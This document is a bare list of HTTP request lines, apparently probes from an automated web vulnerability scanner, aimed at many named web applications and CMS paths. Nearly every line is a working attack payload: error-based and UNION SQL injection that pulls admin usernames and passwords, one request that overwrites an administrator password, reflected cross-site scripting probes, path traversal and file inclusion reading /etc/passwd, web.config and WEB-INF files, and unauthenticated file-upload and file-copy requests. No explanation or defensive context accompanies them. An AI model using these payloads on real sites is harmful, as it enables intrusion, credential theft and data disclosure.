GET /?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
GET /index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
GET /?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
GET /index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
GET /index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
GET /wap/index.php
GET /deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
GET /statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
GET /member/index.php
GET /wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
POST /video.php
POST /news.php?classid=2
GET /ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
GET /count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
POST /ajax.php?action=contentpage
GET /comments.php?id=3a&tablepre=boka_ckck
GET /rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
GET //wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
GET /admin/index.php?_m=../template/css/login.css%00&_a=admin_list
GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
GET /login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
GET /info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
POST /ajax.php?action=letter&letter=a
GET /index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
GET /index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
GET /index.php/Index/index/name/$%7B@print(md5(1122))%7D
GET /index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
POST /index.php?m=payment&s=admin/pickupmod
GET /admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
GET /user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
HEAD /servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
POST /mep-admin/DcServlet
GET /mep-admin/userAction!queryUser.action?start=0&limit=10
GET /admin/picupload.aspx
GET /manager/picupload.aspx
GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
POST /TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
GET /admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
GET /index.php?c=tj&f=include&js=/../../config.php
GET /index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
GET /api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
GET /radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
GET /system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
GET /cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
GET /
GET /styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
GET /web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
GET /forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
POST /Ajax_Handle/UploadPictureHandler.ashx
POST /Ajax_Handle/UploadLocalVideoHandler.ashx
POST /index.php?m=api&a=userpreview
POST /index.php?m=Appmanager&a=loadapp
POST /CMSUploadFile.aspx
POST /api/shop.aspx
GET /sysinfo.jsp
GET /login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
GET /login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
HEAD /file/MyDownLoad.ashx?path=../web.config
GET /file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
GET /broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
GET /feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
GET /channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
GET /login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
GET /api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
HEAD /FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
GET /setup/setup1.jsp
GET /examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
GET /Article/?Type=18%20/**/and/**/1=char(106)--
GET /login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
HEAD /file/EmailDownload.ashx?url=~/web.config&name=web.config
HEAD /file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
HEAD /file/DownLoad.ashx?path=~/Routes.config
GET /file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
GET /file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
HEAD /download.jsp?path=WEB-INF/&name=web.xml
HEAD /page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
POST /mx_form/order_save.php
POST /index.php?app=tag&ac=add&ts=do
GET /member.php?act=index
GET /Article/?KeyWord=1'%20and%201=char(97)%20--
HEAD /apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
GET /Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
GET /Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
GET /Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
GET /Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
HEAD /jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
HEAD /jiep/down.jsp?pathfile=down.jsp%00.txt
GET /index.php?m=Goods&a=showcate&id=1'cfreer
GET /Goods-showcate-id-1.html'cfreer
GET /pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
POST /jvideo/objectbox/selectx_userlist.jsp
GET /yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
GET /Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
GET /Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
GET /celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
GET /ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
GET /ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
GET /burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /oa_server/App_Pages/App_page/UserSpuerAdd.aspx
GET /oa_server/App_Pages/App_page/user_list.aspx
POST /cms/cms/site/cms_site_template_upload.jsp?action=save
GET /cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
GET /deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
GET /deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
GET /lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
POST /web/SubmitLogin.do
GET /pic.aspx?classid=60)%20and%201=char(106)%20--
GET /frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
GET /engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
GET /index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
GET /SRP2003/UserManage/sysuser/modifypage.asp?id=1
GET /venus/AsVenusCA/desk/message/reply.asp
GET /Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
POST /mx_form/order_save.php?form_id=5
HEAD /download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
GET /cms/web/testsql.jsp
POST /web/zwdt/jjj.BjcxServlet
GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd
POST /cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
POST /cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
GET /webUser/webUser!list.action
GET /logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /admin/annual/delete_leave.post.php
GET /admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
GET /admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
GET /admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
GET /down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
POST /jdwm/cgi/getpwd.cgi
GET /public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
GET /public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
GET /cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
GET /cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
GET /cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
GET /CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
GET /forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
GET /forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
GET /search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
POST /public/editext/up/soundsave.asp
POST /public/AspUpload/upload.asp?path=../../upload&processid=1
GET /xyEmployee_checkLoginForUser.do?userName=reer
GET /opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
GET /kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
GET /kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
GET /kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
GET /picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
HEAD /opensoft.asp?%69d=10%20and%201=2
GET /phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
POST /bmsltxDetail.do
POST /setAcceptance.do
POST /setAcceptance.do
GET /setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /nobom.php
GET /infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
GET /lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
GET /lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
GET /admin/Admin_Config.asp
GET /Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
GET /zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
POST /FileUpload
GET /oa_server/App_Pages/App_page/user_update.aspx?userid=172
GET /api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
GET /conformID.asp?Tid=jx'%20and%201=char(106)%20--
GET /DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
HEAD /KS_Data/KesionCMS6.mdb
HEAD /KS_Data/KesionCMS7.mdb
HEAD /KS_Data/KesionCMS8.mdb
HEAD /KS_Data/KesionCMS9.mdb
GET /conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
POST /Asearch.asp
GET /linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
GET /zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
GET /Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
GET /specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
GET /toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
GET /index.php?c=ajax&a=member_login&template=../../ooxx.php
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
GET /workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
POST /search.aspx
HEAD /servlet/fileOpenforms?filename=/index.jsp
HEAD /application/gzhd/bgxz/download.jsp?filename=/index.jsp
GET /livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
GET /truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
GET /NewsList.asp
GET /ActivityList.asp
GET /WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
POST /common/guestbook.php
POST /common/help.php
GET /Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
POST /wap/index.php?a=newslist
GET /index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
GET /?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
